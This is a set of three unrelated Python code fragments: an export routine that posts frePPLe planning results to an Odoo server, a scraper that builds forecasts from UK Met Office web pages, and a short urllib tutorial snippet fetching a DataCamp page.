encoding="UTF-8" ?>' yield '<plan xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">' # Export relevant operationplans yield "<operationplans>" for i in frepple.operationplans(): if i.ordertype == "PO": if (not i.item or not i.item.source or not i.item.source.startswith("odoo") or i.status not in ("proposed", "approved")): continue cls.exported.append(i) yield '<operationplan id="%s" ordertype="PO" item=%s location=%s supplier=%s start="%s" end="%s" quantity="%s" location_id=%s item_id=%s criticality="%d"/>' % ( i.id, quoteattr(i.item.name), quoteattr(i.location.name), quoteattr(i.supplier.name), i.start, i.end, i.quantity, quoteattr(i.location.subcategory), quoteattr(i.item.subcategory), int(i.criticality), ) elif i.ordertype == "MO": if (not i.operation or not i.operation.source or not i.operation.item or not i.operation.source.startswith("odoo") or i.status not in ("proposed", "approved")): continue cls.exported.append(i) res = set() try: for j in i.loadplans: res.add(j.resource.name) except Exception: pass demand = {} demand_str = "" for d in i.pegging_demand: demand[d.demand] = d.quantity demand_str += "%s:%s, " % (d.demand, d.quantity) if demand_str: demand_str = demand_str[:-2] yield '<operationplan id="%s" ordertype="MO" item=%s location=%s operation=%s start="%s" end="%s" quantity="%s" location_id=%s item_id=%s criticality="%d" resource=%s demand=%s/>' % ( i.id, quoteattr(i.operation.item.name), quoteattr(i.operation.location.name), quoteattr(i.operation.name), i.start, i.end, i.quantity, quoteattr(i.operation.location.subcategory), quoteattr(i.operation.item.subcategory), int(i.criticality), quoteattr(",".join(res)), quoteattr(demand_str), ) yield "</operationplans>" yield "</plan>" yield "--%s--\r" % boundary yield "\r" # Connect to the odoo URL to POST data try: cls.exported = [] body = "\n".join(publishPlan(cls)).encode("utf-8") size = len(body) encoded = base64.encodestring( ("%s:%s" % (odoo_user, odoo_password)).encode("utf-8")) req = Request( "%sfrepple/xml/" % odoo_url, data=body, headers={ "Authorization": "Basic %s" % encoded.decode("ascii")[:-1], "Content-Type": "multipart/form-data; boundary=%s" % boundary, "Content-length": size, }, ) # Posting the data and displaying the server response logger.info("Uploading %d bytes of planning results to odoo" % size) with urlopen(req) as f: msg = f.read() logger.info("Odoo response: %s" % msg.decode("utf-8")) # Mark the exported operations as approved for i in cls.exported: i.status = "approved" del cls.exported except HTTPError as e: logger.error("Error connecting to odoo %s" % e.read())
def get_ukmet_forecast(stid, ukmet_code, forecast_date): """ Retrieve UKMET data. :param stid: station ID :param ukmet_code: site-specific URL code from ukmet.codes :param forecast_date: datetime of day to forecast :return: Forecast object for high, low, max wind for next 6Z--6Z. No precip. """ # Retrieve the model data url = 'https://www.metoffice.gov.uk/public/weather/forecast/%s' % ukmet_code req = Request(url, headers=hdr) response = urlopen(req) page = response.read().decode('utf-8', 'ignore') soup = BeautifulSoup(page, 'lxml') # Find UTC offset and current time in HTML utcoffset = int(soup.find(id='country').text.split('-')[1][0:2]) epoch = float(soup.find("td", {"id": "firstTimeStep"})['data-epoch']) utcnow = datetime.utcfromtimestamp(epoch) # Store daily variables days = [] highs = [] # this can be overwritten by hourly lows = [] # this can be overwritten by hourly winds = [] # this comes from hourly # Pull in daily data using li tabs tabids = ['tabDay1', 'tabDay2', 'tabDay3'] for ids in tabids: pars = soup.find(id=ids) days.append(datetime.strptime(pars['data-date'], '%Y-%m-%d')) highs.append( c_to_f( pars.findAll("span", {"title": "Maximum daytime temperature" })[0]['data-value-raw'])) lows.append( c_to_f( pars.findAll("span", {"title": "Minimum nighttime temperature" })[0]['data-value-raw'])) # Pull in hourly data # This requires PhantomJS to pull out additional HTML code driver = webdriver.PhantomJS( executable_path='/home/disk/p/wxchallenge/bin/phantomjs') driver.get(url + '#?date=2017-09-21') source = driver.page_source soup = BeautifulSoup(source, 'html.parser') dateTime = [] temperature = [] temperature_c = [] dewpoint = [] windSpeed = [] windGust = [] windDirection = [] humidity = [] # this is temporary--converted to dew point below divids = [ 'divDayModule0', 'divDayModule1', 'divDayModule2', 'divDayModule3' ] for i, divs in enumerate(divids): day0 = datetime.strptime( soup.find("div", {"id": "divDayModule0"})['data-content-id'], '%Y-%m-%d') day1 = (day0 + timedelta(days=1)).strftime('%Y-%m-%d') pars = soup.find(id=divs) divdate = datetime.strptime(pars['data-content-id'], '%Y-%m-%d').date() hourels = pars.findAll("tr", {"class": "weatherTime"})[0].find_all('td') for ii, ele in enumerate(hourels): if ele.text == 'Now': dateTime.append(utcnow) else: dtmp = datetime(divdate.year, divdate.month, divdate.day, int(ele.text.split(':')[0]), int(ele.text.split(':')[1])) dateTime.append(dtmp + timedelta(hours=utcoffset)) tempels = pars.findAll("tr", {"class": "weatherTemp"})[0].findAll( "i", {"class": "icon icon-animated"}) for ele in tempels: temperature_c.append(float(ele['data-value-raw'])) temperature.append(c_to_f(ele['data-value-raw'])) # relative humidity for conversion to dew point humels = pars.findAll("tr", {"class": "weatherHumidity"})[0].text.split() for ele in humels: humidity.append(float(ele.split('%')[0])) # add wind speedels = pars.findAll("i", {"data-type": "windSpeed"}) for ele in speedels: windSpeed.append(np.round(mph_to_kt(ele['data-value-raw']), 2)) gustels = pars.findAll("span", {"class": "gust"}) for ele in gustels: windGust.append(mph_to_kt(ele['data-value-raw'])) direls = pars.findAll("span", {"class": "direction"}) for ele in direls: windDirection.append(wind_dir_to_deg(ele.text)) # Convert T and humidity to dewpt for ii, rh in enumerate(humidity): td_tmp = dewpoint_from_t_rh(temperature_c[ii], rh) dewpoint.append(c_to_f(td_tmp)) # Make into dataframe df = pd.DataFrame( { 'temperature': temperature, 'dewpoint': dewpoint, 'windSpeed': windSpeed, 'windGust': windGust, 'windDirection': windDirection, 'dateTime': dateTime }, index=dateTime) # Correct the highs and lows with the hourly data, find max wind speed forecast_start = forecast_date.replace(hour=6) forecast_end = forecast_start + timedelta(days=1) for d in range(0, len(days)): try: # unlike the mos code, we always use the 'include' iloc_start_include = df.index.get_loc(forecast_start) except BaseException: print('ukmet: error getting start time index in db; check data.') break try: iloc_end = df.index.get_loc(forecast_end) except BaseException: print('ukmet: error getting end time index in db; check data.') break raw_high = df.iloc[iloc_start_include:iloc_end]['temperature'].max() raw_low = df.iloc[iloc_start_include:iloc_end]['temperature'].min() winds.append( int( np.round( df.iloc[iloc_start_include:iloc_end]['windSpeed'].max()))) if raw_high > highs[d]: highs[d] = raw_high if raw_low < lows[d]: lows[d] = raw_low forecast_start = forecast_start + timedelta(days=1) forecast_end = forecast_end + timedelta(days=1) forecast = Forecast(stid, default_model_name, days[0]) forecast.timeseries.data = df forecast.daily.set_values(highs[0], lows[0], winds[0], None) # # Make list of forecast objects for future days--currently not implemented # # forecast = [] # # for i in range(0,len(days)): # forecast_tmp = Forecast(stid, default_model_name, days[i]) # forecast_tmp.daily.date = days[i] # forecast_tmp.daily.high = highs[i] # forecast_tmp.daily.low = lows[i] # forecast.append(forecast_tmp) return forecast
# print(xls['1700'].head()) # We can send http request for the html page using urllib or requests package # Performing HTTP requests in Python using urllib # Get requests to extract info from teach page # Import packages from urllib.request import urlopen, Request # Specify the url url = "http://www.datacamp.com/teach/documentation" # This packages the request: request request = Request(url) # Sends the request and catches the response: response response = urlopen(request) # Print the datatype of response print(type(response)) # <class 'http.client.HTTPResponse'> # Extract the response: html html = response.read() # Print html # print(html) # Be polite and close the response! response.close()